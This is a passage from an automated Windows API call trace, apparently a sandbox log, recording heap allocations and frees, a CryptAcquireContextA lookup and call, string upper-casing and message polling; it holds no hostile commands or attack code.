HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0255.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0255.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0255.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.468] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0255.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.469] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.470] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0255.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0255.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0255.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0255.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0255.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0255.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0255.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0255.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0255.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0255.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0255.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0255.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.474] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.474] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.474] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0255.474] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.475] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0255.475] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.475] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.475] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.475] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.475] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.475] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.475] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.476] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.476] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.476] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.476] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.476] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.476] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.476] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0255.477] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.477] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.477] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0255.477] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.477] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0255.477] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.477] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, 